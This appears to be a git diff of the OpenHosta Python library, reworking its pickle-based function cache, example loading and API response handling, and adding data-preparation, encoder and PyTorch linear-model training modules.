- cached_data["ho_cothougt_id"],
- )
- with open(path_name, "wb") as f:
- pickle.dump(cached_data, f)
- return
+ if self.value is not None:
+ if not self._is_value_already_in_example(self.value, cached_data):
+ cached_data[str(self.cache_id)].append(self.value)
+ cached_data[f"{str(self.cache_id)}_id"] = self._get_hashFunction(
+ str(cached_data[str(self.cache_id)]), 0, 0
+ )
+ cached_data["hash_function"] = self._get_hashFunction(
+ cached_data["function_def"],
+ cached_data["ho_example_id"],
+ cached_data["ho_cothougt_id"],
+ )
+ with open(path_name, "wb") as f:
+ pickle.dump(cached_data, f)
+
+ return cached_data
+
+ return self._parse_and_create_cache_file(path_name)
+
+ def _parse_and_create_cache_file(self, path_name):
+ """ When cache_id is None or cache doesn't exist, create a cache just for function metadata """
hosta_args = self._get_argsFunction(self.func)
with open(path_name, "wb") as f:
pickle.dump(hosta_args, f)
- return
-
- def _is_value_already_in_example(self, value, cached_data):
- for item in cached_data["ho_example"]:
- if isinstance(item, dict):
- if item == value:
- return True
- elif isinstance(item, list):
- for sub_item in item:
- if sub_item == value:
- return True
- return False
-
- def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
- combined = f"{func_def}{nb_example}{nb_thought}"
- return hashlib.md5(combined.encode()).hexdigest()
+ return hosta_args
def _get_argsFunction(self, func_obj):
self.infos_cache["function_def"], func_prot = self._get_functionDef(func_obj)
self.infos_cache["return_type"], self.infos_cache["return_caller"] = (
self._get_functionReturnType(func_obj)
)
- self.infos_cache[self.cache_id].append(self.value)
- self.infos_cache[f"{str(self.cache_id)}" + "_id"] = self._get_hashFunction(
- str(self.infos_cache[str(self.cache_id)]), 0, 0
- )
+
+ if self.cache_id is not None and self.value is not None:
+ if self.cache_id in self.infos_cache:
+ self.infos_cache[self.cache_id].append(self.value)
+ else:
+ self.infos_cache[self.cache_id] = [self.value]
+
+ self.infos_cache[f"{self.cache_id}_id"] = self._get_hashFunction(
+ str(self.infos_cache[self.cache_id]), 0, 0
+ )
+
self.infos_cache["hash_function"] = self._get_hashFunction(
self.infos_cache["function_def"],
self.infos_cache["ho_example_id"],
@@ -88,6 +98,29 @@ def _get_argsFunction(self, func_obj):
)
return self.infos_cache
+ def _is_value_already_in_example(self, value, cached_data):
+ if self.cache_id not in cached_data:
+ print("Cache ID not found in cache file")
+ return False
+
+ def recursive_check(item, value):
+ if isinstance(item, dict):
+ if item == value or any(recursive_check(v, value) for v in item.values()):
+ return True
+ elif isinstance(item, list):
+ return any(recursive_check(sub_item, value) for sub_item in item)
+ else:
+ return item == value
+
+ for item in cached_data[self.cache_id]:
+ if recursive_check(item, value):
+ return True
+ return False
+
+ def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
+ combined = f"{func_def}{nb_example}{nb_thought}"
+ return hashlib.md5(combined.encode()).hexdigest()
+
def _get_functionDef(self, func: Callable) -> str:
sig = inspect.signature(func)
@@ -107,7 +140,10 @@ def _get_functionDef(self, func: Callable) -> str:
if sig.return_annotation != inspect.Signature.empty
else ""
)
- definition = f"def {func_name}({func_params}):{func_return}\n '''\n {func.__doc__}\n '''"
+ definition = (
+ f"```python\ndef {func_name}({func_params}):{func_return}\n"
+ f" \"\"\"\n\t{func.__doc__}\n \"\"\"\n```"
+ )
prototype = f"def {func_name}({func_params}):{func_return}"
return definition, prototype
@@ -161,5 +197,4 @@ def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
"Hosta_return_shema", return_hosta_type_any=(Any, ...)
)
return_type = No_return_specified.model_json_schema()
-
- return return_type, return_caller
+ return return_type, return_caller
\ No newline at end of file
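
The cache key computed in `_get_hashFunction` above is an MD5 digest of the function definition concatenated with the example and thought counters. A standalone sketch of the same hashing:

```python
import hashlib

def cache_hash(func_def: str, nb_example: int, nb_thought: int) -> str:
    """MD5 over the function definition plus the example/thought counters."""
    combined = f"{func_def}{nb_example}{nb_thought}"
    return hashlib.md5(combined.encode()).hexdigest()

h = cache_hash("def f(x): ...", 0, 0)
print(h)
```

Any change to the function definition or to either counter produces a different digest, which is what lets the cache detect staleness.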
diff --git a/src/OpenHosta/config.py b/src/OpenHosta/config.py
index 42623e3..2546623 100644
--- a/src/OpenHosta/config.py
+++ b/src/OpenHosta/config.py
@@ -42,6 +42,7 @@ def __init__(self, model: str = None, base_url: str = None, api_key: str = None)
frozenset: lambda x: frozenset(x),
tuple: lambda x: tuple(x),
bool: lambda x: bool(x),
+ type(None): lambda x: None,
}
if any(var is None for var in (model, base_url)):
@@ -85,7 +86,6 @@ def api_call(
"Content-Type": "application/json",
"Authorization": f"Bearer {self.api_key}",
}
-
self._last_request = l_body
try:
@@ -101,7 +101,7 @@ def api_call(
return response
def request_handler(self, response, return_type, return_caller):
- l_ret = ""
+ l_ret = None
data = response.json()
json_string = data["choices"][0]["message"]["content"]
@@ -122,7 +122,8 @@ def request_handler(self, response, return_type, return_caller):
if "return_hosta_type" in return_type["properties"]:
if return_caller in self.conversion_function:
convert_function = self.conversion_function[return_caller]
- l_ret = convert_function(l_ret_data["return"])
+ if l_ret_data["return"] is not None:
+ l_ret = convert_function(l_ret_data["return"])
else:
l_ret = l_ret_data["return"]
@@ -140,7 +141,7 @@ def request_handler(self, response, return_type, return_caller):
for m in self.__last_request["messages"]:
sys.stderr.write(" "+m["role"]+">\n=======\n", m["content"][0]["text"])
sys.stderr.write("Answer>\n=======\n", l_ret_data["return"])
- lret = None
+ l_ret = None
else:
l_ret = l_ret_data["return"]
diff --git a/src/OpenHosta/datapreparator.py b/src/OpenHosta/datapreparator.py
new file mode 100644
index 0000000..ad21f6d
--- /dev/null
+++ b/src/OpenHosta/datapreparator.py
@@ -0,0 +1,241 @@
+import torch
+from torch.utils.data import DataLoader
+import os
+import json
+import csv
+import numpy as np
+
+from .encoder import HostaEncoder
+from .decoder import HostaDecoder
+
+class Datapreparator():
+ def __init__(self, norm_max, norm_min, encoder=None, decoder=None):
+ self.encoder = encoder if encoder else HostaEncoder()
+ self.decoder = decoder if decoder else HostaDecoder()
+
+ if norm_min:
+ self.norm_min = norm_min
+ else:
+ self.norm_min = 0.1
+ if norm_max:
+ self.norm_max = norm_max
+ else:
+ self.norm_max = 1.0
+
+ self.data_min_nonzero = None
+ self.data_max = None
+ self.data_min = None
+ self.data_range = None
+
+ self.prediction_min_nonzero = None
+ self.prediction_max = None
+ self.prediction_min = None
+ self.prediction_range = None
+
+ def prepare_input(self, in_value):
+ input_data = []
+ for key, value in in_value.items():
+ if isinstance(value, dict):
+ for sub_key, sub_value in value.items():
+ parsed_value = self.encoder.encode(sub_value)
+ input_data.extend(parsed_value)
+ elif isinstance(value, list):
+ for item in value:
+ parsed_value = self.encoder.encode(item)
+ input_data.extend(parsed_value)
+ else:
+ parsed_value = self.encoder.encode(value)
+ input_data.extend(parsed_value)
+ return input_data
+
+ def prepare(self, function_infos, prediction):
+ train = []
+ val = []
+ if function_infos["ho_example"] == [] and function_infos["ho_data"] == []:
+ raise ValueError("No example provided please provide at least one example for the model")
+
+ if function_infos["ho_data"] != []:
+ for example in function_infos["ho_data"]:
+ value = self.parse_dict(example, prediction)
+ train.extend(value)
+ if function_infos["ho_example"] != []:
+ for example in function_infos["ho_example"]:
+ value = self.parse_dict(example, prediction)
+ val.extend(value)
+ else:
+ for example in function_infos["ho_example"]:
+ value = self.parse_dict(example, prediction)
+ train.extend(value)
+ return train, val
+
+ def normalize_dataset(self, train, val):
+ dataset = train + val if val != [] else train
+ data_values = [example[0] for example in dataset]
+ prediction_values = [example[1] for example in dataset]
+
+ data_array = np.array(data_values)
+ prediction_array = np.array(prediction_values)
+
+ negative_data = np.any(data_array < 0, axis=0)
+ negative_prediction = np.any(prediction_array < 0, axis=0)
+
+ self.data_min_nonzero = np.array([
+ np.min(data_array[:, i][data_array[:, i] > 0]) if not negative_data[i] and np.any(data_array[:, i] > 0) else 0
+ for i in range(data_array.shape[1])])
+ self.data_max = data_array.max(axis=0)
+ self.data_min = data_array.min(axis=0)
+
+ self.prediction_min_nonzero = np.array([
+ np.min(prediction_array[:, i][prediction_array[:, i] > 0]) if not negative_prediction[i] and np.any(prediction_array[:, i] > 0) else 0
+ for i in range(prediction_array.shape[1])])
+ self.prediction_max = prediction_array.max(axis=0)
+ self.prediction_min = prediction_array.min(axis=0)
+
+ self.data_range = self.data_max - self.data_min_nonzero
+ self.data_range[self.data_range == 0] = 1
+
+ self.prediction_range = self.prediction_max - self.prediction_min_nonzero
+ self.prediction_range[self.prediction_range == 0] = 1
+
+ normalized_data = np.zeros_like(data_array)
+ for i in range(data_array.shape[1]):
+ zero_mask = data_array[:, i] == 0
+ normalized_data[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((data_array[:, i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min))
+
+ normalized_prediction = np.zeros_like(prediction_array)
+ for i in range(prediction_array.shape[1]):
+ zero_mask = prediction_array[:, i] == 0
+ normalized_prediction[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((prediction_array[:, i] - self.prediction_min_nonzero[i]) / self.prediction_range[i]) * (self.norm_max - self.norm_min))
+
+        # TODO: maybe drop tolist() later; kept for now because downstream code expects lists
+ normalized_dataset = list(zip(normalized_data.tolist(), normalized_prediction.tolist()))
+ train = normalized_dataset[:len(train)]
+ val = normalized_dataset[len(train):] if val else None
+ return train, val
+
+ def normalize_inference(self, inference_data):
+ inference_data = np.array(inference_data)
+
+ normalized_inference = np.zeros_like(inference_data)
+ for i in range(len(inference_data)):
+ if inference_data[i] == 0:
+ normalized_inference[i] = 0.0
+ else:
+ normalized_inference[i] = self.norm_min + ((inference_data[i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min)
+
+ return normalized_inference.tolist()
+
+ def denormalize_prediction(self, prediction):
+ prediction = prediction.detach().cpu().numpy()
+
+ denormalized_prediction = np.zeros_like(prediction)
+ for i in range(len(prediction)):
+ if prediction[i] == 0:
+ denormalized_prediction[i] = 0.0
+ else:
+ denormalized_prediction[i] = self.prediction_min_nonzero[i] + ((prediction[i] - self.norm_min) / (self.norm_max - self.norm_min)) * self.prediction_range[i]
+
+ return denormalized_prediction.tolist()
+
+ def save_normalization_params(self, path):
+ params = {
+ 'norm_min': self.norm_min,
+ 'norm_max': self.norm_max,
+ 'data_min_nonzero': self.data_min_nonzero.tolist(),
+ 'data_max': self.data_max.tolist(),
+ 'data_min': self.data_min.tolist(),
+ 'data_range': self.data_range.tolist(),
+ 'prediction_min_nonzero': self.prediction_min_nonzero.tolist(),
+ 'prediction_max': self.prediction_max.tolist(),
+ 'prediction_min': self.prediction_min.tolist(),
+ 'prediction_range': self.prediction_range.tolist()
+ }
+ with open(path, 'w') as f:
+ json.dump(params, f)
+
+ def load_normalization_params(self, path):
+ try:
+ with open(path, 'r') as f:
+ params = json.load(f)
+ self.norm_min = params['norm_min']
+ self.norm_max = params['norm_max']
+ self.data_min_nonzero = np.array(params['data_min_nonzero'])
+ self.data_max = np.array(params['data_max'])
+ self.data_min = np.array(params['data_min'])
+ self.data_range = np.array(params['data_range'])
+ self.prediction_min_nonzero = np.array(params['prediction_min_nonzero'])
+ self.prediction_max = np.array(params['prediction_max'])
+ self.prediction_min = np.array(params['prediction_min'])
+ self.prediction_range = np.array(params['prediction_range'])
+ except Exception as e:
+ raise IOError(f"An error occurred while loading the normalization parameters: {e}")
+
+ def convert(self, inference):
+ return torch.tensor(inference, dtype=torch.float32)
+
+ def split(self, train_normalization, val_normalization, batch_size):
+ datatensor = []
+
+ for examples in train_normalization:
+ feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
+ label_tensor = torch.tensor(examples[1], dtype=torch.float32)
+
+ tensor = [feature_tensor, label_tensor]
+ datatensor.append(tensor)
+
+ train = DataLoader(datatensor, batch_size=batch_size, shuffle=True)
+
+ if val_normalization:
+ valtensor = []
+ for examples in val_normalization:
+ feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
+ label_tensor = torch.tensor(examples[1], dtype=torch.float32)
+
+ tensor = [feature_tensor, label_tensor]
+ valtensor.append(tensor)
+ val = DataLoader(valtensor, batch_size=batch_size, shuffle=False)
+        else:
+            val = None
+ return train, val
+
+ def parse_dict(self, example, prediction):
+ dataset = []
+ input_data = []
+ output_data = []
+ for key, value in example.items():
+ if key in prediction or key == "hosta_out":
+ parsed_value = self.encoder.encode(value)
+ output_data.extend(parsed_value)
+ else:
+ parsed_value = self.encoder.encode(value)
+ input_data.extend(parsed_value)
+ dataset.append([input_data, output_data])
+ return dataset
+
+def open_file(ho_examples):
+ list_of_examples = []
+ for path in ho_examples:
+ _, file_extension = os.path.splitext(path)
+ try:
+ if file_extension == '.jsonl':
+ with open(path, "r") as file:
+ for line in file:
+ example = json.loads(line.strip())
+ list_of_examples.append(example)
+
+ elif file_extension == '.csv':
+ with open(path, "r", newline='') as file:
+ csv_reader = csv.DictReader(file)
+ for row in csv_reader:
+ list_of_examples.append(row)
+
+ elif file_extension == '.txt':
+ with open(path, "r") as file:
+ for line in file:
+ list_of_examples.append(line.strip())
+
+ else:
+ raise ValueError("Unsupported file type. Please provide a JSONL, CSV, or TXT file.")
+
+ except Exception as e:
+ raise IOError(f"An error occurred while processing the file: {e}")
+ return list_of_examples
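
`parse_dict` above splits each example dict into input features and target values, treating `hosta_out` (or any key named in `prediction`) as the target. A minimal sketch of that split, simplified to numeric values:

```python
def split_example(example: dict, prediction=("hosta_out",)):
    """Separate an example dict into (input_values, target_values)."""
    inputs, targets = [], []
    for key, value in example.items():
        (targets if key in prediction else inputs).append(float(value))
    return inputs, targets

print(split_example({"age": 55.0, "hosta_out": 0.6}))  # ([55.0], [0.6])
```

The real `parse_dict` additionally runs each value through the encoder, so non-numeric inputs are rejected there rather than here.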
diff --git a/src/OpenHosta/decoder.py b/src/OpenHosta/decoder.py
new file mode 100644
index 0000000..c76aadb
--- /dev/null
+++ b/src/OpenHosta/decoder.py
@@ -0,0 +1,3 @@
+class HostaDecoder():
+ def __init__(self) -> None:
+ pass
diff --git a/src/OpenHosta/encoder.py b/src/OpenHosta/encoder.py
new file mode 100644
index 0000000..a975ad0
--- /dev/null
+++ b/src/OpenHosta/encoder.py
@@ -0,0 +1,36 @@
+from typing import Any
+
+class HostaEncoder():
+ def __init__(self) -> None:
+        pass
+
+ def encode(self, value: Any):
+ if type(value) == int:
+ return IntEncoder.encoder(value)
+ elif type(value) == float:
+ return FloatEncoder.encoder(value)
+ elif type(value) == str:
+ try:
+                return FloatEncoder.encoder(value)
+            except ValueError:
+ raise ValueError("String cannot be converted to float (numbers in string only supported for now)")
+ else:
+ raise ValueError("Type not supported")
+
+
+class IntEncoder(HostaEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+    @staticmethod
+    def encoder(data):
+ data_encode = int(data)
+ return [data_encode]
+
+class FloatEncoder(HostaEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+    @staticmethod
+    def encoder(data):
+ data_encode = float(data)
+ return [data_encode]
diff --git a/src/OpenHosta/enhancer.py b/src/OpenHosta/enhancer.py
index 7018163..08a3cb8 100644
--- a/src/OpenHosta/enhancer.py
+++ b/src/OpenHosta/enhancer.py
@@ -68,7 +68,6 @@ def _build_attributes(func: object, last_enh) -> int:
func.review = last_enh["review"]
func.advanced = last_enh["advanced"]
func.diagram = last_enh["mermaid"]
- func.diagramm = last_enh["mermaid"]
return 0
diff --git a/src/OpenHosta/example.py b/src/OpenHosta/example.py
index 6c13b87..4a75954 100644
--- a/src/OpenHosta/example.py
+++ b/src/OpenHosta/example.py
@@ -2,7 +2,10 @@
import pickle
import os
import json
+import csv
+from typing import Callable
+from .errors import FrameError
from .cache import Hostacache
CACHE_DIR = "__hostacache__"
@@ -16,16 +19,13 @@ def example(*args, hosta_func=None, hosta_out=None, **kwargs):
if hosta_func is None:
try:
- func_frame = inspect.currentframe().f_back
- func_name = func_frame.f_code.co_name
- func = func_frame.f_globals[func_name]
+ func, _ = _extend_scope()
except:
- raise ValueError(f"Please provide hosta_func for specifying the function")
-
+ raise ValueError("Please provide hosta_func for specifying the function")
elif callable(hosta_func):
func = hosta_func
else:
- raise ValueError(f"Please provide hosta_func for specifying the function")
+ raise ValueError("Please provide hosta_func for specifying the function")
try:
sig = inspect.signature(func)
@@ -33,60 +33,73 @@ def example(*args, hosta_func=None, hosta_out=None, **kwargs):
input_type[param.name] = param.annotation
output_type["hosta_out"] = sig.return_annotation
except:
- raise ValueError(f"Function does not have signature")
- if args != ():
+ raise ValueError("Function does not have a signature")
+
+ type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict)
+
+ cache_id = "ho_example"
+ cache = Hostacache(func, cache_id, example_dict)
+ cache.create_hosta_cache()
+
+
+def type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict):
+ """
+ Validates the types of both positional and keyword arguments, as well as the return value.
+ """
+
+ if args:
if len(args) != len(input_type):
raise ValueError(
- f"Too many arguments for function {func.__name__}, please provide {len(input_type)} arguments, use hosta_out for output"
+ f"Too many arguments for function {func.__name__}, "
+ f"expected {len(input_type)} arguments, use hosta_out for output."
)
for i, arg in enumerate(args):
param_name = list(input_type.keys())[i]
-
expected_type = input_type[param_name]
+
if not isinstance(arg, expected_type):
- raise ValueError(
- f"Argument {arg} does NOT match the expected type {expected_type} for parameter {param_name}. For function {func.__name__}"
+ raise TypeError(
+ f"Argument {arg} does NOT match the expected type "
+ f"{expected_type} for parameter {param_name} in function {func.__name__}."
)
example_dict[param_name] = arg
else:
if len(kwargs) != len(input_type):
raise ValueError(
- f"Too many arguments for function {func.__name__}, please provide {len(input_type)} arguments, use hosta_out for output"
+ f"Mismatch in number of keyword arguments for function '{func.__name__}', "
+ f"expected {len(input_type)} arguments, use hosta_out for output."
)
for key, value in kwargs.items():
expected_type = input_type[key]
+
if not isinstance(value, expected_type):
- raise ValueError(
- f"Argument {value} does NOT match the expected type {expected_type} for parameter {key}. For function {func.__name__}"
+ raise TypeError(
+ f"Keyword argument {value} does NOT match the expected type "
+ f"{expected_type} for parameter {key} in function {func.__name__}."
)
example_dict[key] = value
if hosta_out is None:
- raise ValueError(f"Please provide hosta_out for output")
+ raise ValueError("Please provide hosta_out for output.")
else:
- expected_type = output_type["hosta_out"]
- if not isinstance(hosta_out, expected_type):
- raise ValueError(
- f"Output {hosta_out} does NOT match the expected type {expected_type}. For function {func.__name__}"
+ expected_output_type = output_type["hosta_out"]
+ if not isinstance(hosta_out, expected_output_type):
+ raise TypeError(
+ f"Output {hosta_out} does NOT match the expected type "
+ f"{expected_output_type} for function {func.__name__}."
)
example_dict["hosta_out"] = hosta_out
- cache_id = "ho_example"
- cache = Hostacache(func, cache_id, example_dict)
- cache()
-
def save_examples(hosta_func=None, hosta_path=None):
cached_data = {}
if hosta_func is None:
try:
- func_frame = inspect.currentframe().f_back
- func_name = func_frame.f_code.co_name
- func = func_frame.f_globals[func_name]
+ func, _ = _extend_scope()
except:
raise ValueError(f"Please provide hosta_func for specifying the function")
@@ -104,49 +117,140 @@ def save_examples(hosta_func=None, hosta_path=None):
func_name = func.__name__
path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+
try:
if os.path.exists(path_name):
with open(path_name, "rb") as f:
cached_data = pickle.load(f)
- with open(total_path, "w") as t:
+ with open(total_path, "a") as t:
for dict in cached_data["ho_example"]:
t.write(json.dumps(dict) + "\n")
+ t.write(json.dumps(dict) + "\n")
else:
raise ValueError(f"Could not found the cache at {path_name}")
except Exception as e:
raise ValueError(f"Could not found the cache at {path_name}") from e
-def load_examples(hosta_func=None, hosta_path=None):
- if hosta_func is None:
+def load_training_example(hosta_path: str, hosta_func: callable) -> dict:
+ """
+ Load the training example from the cache.
+ """
+ func_name = hosta_func.__name__
+ path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+
+ cached_data = None
+
+ if os.path.exists(path_name):
try:
- func_frame = inspect.currentframe().f_back
- func_name = func_frame.f_code.co_name
- func = func_frame.f_globals[func_name]
- except:
- raise ValueError(f"Please provide hosta_func for specifying the function")
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
+ except (pickle.PickleError, IOError) as e:
+ raise ValueError(f"Error loading cache from {path_name}") from e
+ else:
+ cache = Hostacache(hosta_func, None)
+ cache.create_hosta_cache()
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
- elif callable(hosta_func):
- func = hosta_func
+ _, file_extension = os.path.splitext(hosta_path)
+ if file_extension not in ['.json', '.jsonl', '.csv']:
+ raise ValueError("Unsupported file type. Please provide a JSON or JSONL or CSV file.")
+
+ try:
+ with open(hosta_path, 'r') as file:
+ if file_extension == '.json':
+ data = json.load(file)
+ if isinstance(data, list):
+ for item in data:
+ if item not in cached_data['ho_data']:
+ cached_data['ho_data'].append(item)
+ else:
+ if data not in cached_data['ho_data']:
+ cached_data['ho_data'].append(data)
+ elif file_extension == '.jsonl':
+ for line in file:
+ item = json.loads(line)
+ if item not in cached_data['ho_data']:
+ cached_data['ho_data'].append(item)
+ elif file_extension == '.csv':
+ reader = csv.DictReader(file)
+ for row in reader:
+ if row not in cached_data['ho_data']:
+ cached_data['ho_data'].append(row)
+ with open(path_name, "wb") as f:
+ pickle.dump(cached_data, f)
+ except (IOError, json.JSONDecodeError) as e:
+ raise ValueError(f"Error loading data from {hosta_path}") from e
+ return cached_data
+
+
+def _extend_scope() -> Callable:
+ func: Callable = None
+ current = None
+ step = None
+ caller = None
+
+ current = inspect.currentframe()
+ if current is None:
+ raise FrameError("Current frame is None")
+ step = current.f_back
+ if step is None:
+ raise FrameError("Caller[lvl1] frame is None")
+ caller = step.f_back
+ if caller is None:
+ raise FrameError("Caller[lvl2] frame is None")
+
+ caller_name = caller.f_code.co_name
+ caller_code = caller.f_code
+ l_caller = caller
+
+ if "self" in caller.f_locals:
+ obj = caller.f_locals["self"]
+ func = getattr(obj, caller_name, None)
+ if func:
+ func = inspect.unwrap(func)
else:
- raise ValueError(f"Please provide hosta_func for specifying the function")
+ while func is None and l_caller.f_back is not None:
+ for obj in l_caller.f_back.f_locals.values():
+ found = False
+ try:
+ if hasattr(obj, "__code__"):
+ found = True
+ except:
+ continue
+ if found and obj.__code__ == caller_code:
+ func = obj
+ break
+ if func is None:
+ l_caller = l_caller.f_back
+ if func is None:
+ func = caller.f_globals.get(caller_name)
+ if func:
+ func = inspect.unwrap(func)
+
+ if func is None or not callable(func):
+ raise FrameError("The emulated function cannot be found.")
- if hosta_path is None:
- raise ValueError(
- f"Please provide hosta_path for specifying the path to load the cache"
- )
+ return func, caller
- list_of_examples = []
- try:
- with open(hosta_path, "r") as file:
- for line in file:
- hosta_example = json.loads(line.strip())
- list_of_examples.append(hosta_example)
- except Exception:
- raise IOError("Please provide a Json or a JsonL file only.")
+EXAMPLE_DOC = """
+A utility function that performs runtime type validation on a given function's arguments and output.
- cache_id = "ho_example"
- value = list_of_examples
- cache = Hostacache(func, cache_id, value)
- cache()
+Parameters:
+ *args:
+ Positional arguments to validate against the input types of the provided function (hosta_func).
+ **kwargs:
+ Keyword arguments (passed by name) to validate against the input types of the provided function.
+ hosta_func (function, optional but recommended):
+ The function whose signature will be used for input/output type validation.
+ hosta_out (object):
+ The expected output of hosta_func, to be validated against the return type annotation.
+
+Raises:
+ ValueError:
+ If the number of arguments provided does not match the expected number as per the function's signature.
+ TypeError:
+ If the type of any argument or output does not match the expected type.
+"""
\ No newline at end of file
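The `_extend_scope` helper added in the diff above recovers the caller's function object by walking call frames. A minimal standalone sketch of the core idea, using only the standard library (the `who_called_me`/`demo` names are illustrative, not from OpenHosta, and this covers only the simple module-level case, not methods or closures):

```python
import inspect

def who_called_me():
    # One frame up is the function that invoked us; look its object
    # up by name in that frame's globals (the simple, non-method case).
    frame = inspect.currentframe().f_back
    return frame.f_globals.get(frame.f_code.co_name)

def demo():
    return who_called_me()

print(demo() is demo)  # True: the helper found the calling function itself
```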
diff --git a/src/OpenHosta/exec.py b/src/OpenHosta/exec.py
index c057a83..bbb4bf3 100644
--- a/src/OpenHosta/exec.py
+++ b/src/OpenHosta/exec.py
@@ -8,8 +8,11 @@
from pydantic import BaseModel, create_model
import copy
+import functools
+
from .enhancer import enhance
from .errors import FrameError
+from .predict import continue_train, to_emulate, retrain
CACHE_DIR = "__hostacache__"
@@ -30,11 +33,15 @@ def __call__(self, *args, **kwargs):
"return_type": "",
"return_caller": "",
"function_call": "",
+ "function_args": {},
"function_locals": {},
"ho_example": [],
"ho_example_id": 0,
+ "ho_example_links": [],
"ho_cothougt": [],
"ho_cothougt_id": 0,
+ "ho_data": [],
+ "ho_data_id" : 0
}
func_obj, caller = self._extend_scope()
func_name = func_obj.__name__
@@ -51,20 +58,21 @@ def __call__(self, *args, **kwargs):
cached_data["ho_cothougt_id"],
)
+ self._attach_attributs(func_obj, func_prot)
if function_hash == cached_data["hash_function"]:
- cached_data["function_call"], cached_data["function_locals"] = (
+ cached_data["function_call"], cached_data["function_locals"], cached_data["function_args"] = (
self._get_functionCall(func_obj, caller)
)
- self._attach_attributs(func_obj, func_prot)
return self.exec(cached_data, func_obj, *args, **kwargs)
hosta_args = self._get_argsFunction(func_obj)
with open(path_name, "wb") as f:
res = pickle.dump(hosta_args, f)
# TODO : fix the function locals because he didn't load in the cache
- hosta_args["function_call"], hosta_args["function_locals"] = (
+ hosta_args["function_call"], hosta_args["function_locals"], hosta_args["function_args"] = (
self._get_functionCall(func_obj, caller)
)
+ self._attach_attributs(func_obj, hosta_args["function_def"])
return self.exec(hosta_args, func_obj, *args, **kwargs)
def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
@@ -82,7 +90,6 @@ def _get_argsFunction(self, func_obj):
self.infos_cache["ho_example_id"],
self.infos_cache["ho_cothougt_id"],
)
- self._attach_attributs(func_obj, func_prot)
return self.infos_cache
def _extend_scope(self) -> Callable:
@@ -189,7 +196,7 @@ def _get_functionCall(self, func: Callable, caller) -> str:
)
call = f"{func.__name__}({args_str})"
- return call, locals
+ return call, locals, values_args
def _inspect_returnType(self, func: Callable) -> str:
sig = inspect.signature(func)
@@ -245,7 +252,21 @@ def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
return return_type, return_caller
- def _attach_attributs(self, func: Callable, prototype: str):
+ def _attach_attributs(self, func: Callable, prototype: str)->None:
+ """
+ Attach additional attributes to a function.
+
+ Args:
+ func (Callable): The target function to which the attributes are attached.
+ prototype (str): A string representing the prototype (used as an example).
+
+ Returns:
+ Callable: The target function wrapped with the attached attributes.
+ """
if "bound method" not in str(func):
setattr(func, "__suggest__", enhance)
- setattr(func, "_prot", prototype)
+ setattr(func, "_prot", prototype)
+ setattr(func, "continue_train", functools.partial(continue_train, func_obj=func))
+ setattr(func, "retrain", functools.partial(retrain, func_obj=func))
+ setattr(func, "emulate", functools.partial(to_emulate, func_obj=func))
+
diff --git a/src/OpenHosta/model.py b/src/OpenHosta/model.py
new file mode 100644
index 0000000..f49acde
--- /dev/null
+++ b/src/OpenHosta/model.py
@@ -0,0 +1,102 @@
+import torch
+import torch.nn as nn
+import torch.nn.functional as F
+import time
+import json
+
+class CustomLinearModel(nn.Module):
+
+ def __init__(self, config, hidden_dir):
+ super().__init__()
+ self.hidden_dir = hidden_dir
+ self.path = hidden_dir+"/config.json"
+ if config == None:
+ try:
+ with open(self.path, 'r') as f:
+ self.config = json.load(f)
+ except Exception as e:
+ raise Exception("Config file not found please check the path : ", self.path)
+ else:
+ self.config = config
+
+ self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
+ self.create_model(self.config)
+
+ self.loss = nn.SmoothL1Loss()
+ self.optimizer = torch.optim.AdamW(self.parameters(), lr=0.001)
+ self.to(self.device)
+
+ def create_model(self, config):
+
+ input_size = config["input_size"]
+ output_size = config["output_size"]
+
+ hidden_sizes = []
+ for key in config:
+ if key.startswith("hidden_size_"):
+ layer_num_str = key.split("_")[-1]
+ if layer_num_str.isdigit():
+ layer_num = int(layer_num_str)
+ hidden_sizes.append((layer_num, config[key]))
+ hidden_sizes.sort(key=lambda x: x[0])
+
+ layer_sizes = [input_size] + [size for _, size in hidden_sizes] + [output_size]
+
+ for idx in range(len(layer_sizes) - 1):
+ in_features = layer_sizes[idx]
+ out_features = layer_sizes[idx + 1]
+ self.add_module(f"fc{idx + 1}", nn.Linear(in_features, out_features, dtype=torch.float32))
+
+ return
+
+ def forward(self, x):
+ x = x.to(self.device)
+ num_layers = len(self.config) - 4
+ for idx in range(1, num_layers):
+ layer = getattr(self, f"fc{idx}")
+ x = F.relu(layer(x))
+
+ layer = getattr(self, f"fc{num_layers}")
+ x = layer(x)
+ return x
+
+
+ def train(self, train, val, epochs, path, verbose=False, get_loss=None, continue_training=False):
+ get_loss=0.0 if get_loss is None else get_loss
+
+ if continue_training:
+ try:
+ self.load_state_dict(torch.load(path+"/model.pth", weights_only=True))
+ if verbose:
+ print(f"\033[93mModel loaded from {path}/model.pth\033[0m")
+ except Exception as e:
+ raise Exception(f"Model weight not found at {path}/model.pth")
+
+ total_start = time.time()
+
+ for epoch in range(epochs):
+ epoch_start = time.time()
+ for X_train, y_train in train:
+ X_train, y_train = X_train.to(self.device), y_train.to(self.device)
+ self.optimizer.zero_grad()
+ output = self.forward(X_train)
+
+ loss = self.loss(output, y_train)
+ loss.backward()
+ self.optimizer.step()
+ epoch_end = time.time()
+ epoch_time = epoch_end - epoch_start
+ if verbose:
+ print(f"\033[94m{epoch}/{epochs} -> Loss: {loss.item()} in {epoch_time} sec\033[0m", flush=True)
+
+ if loss.item() < get_loss:
+ if verbose:
+ print(f"\033[93mLoss target achieved at epoch {epoch} with loss {loss.item()} in {epoch_time} sec\033[0m", flush=True)
+ break
+
+ total_end = time.time()
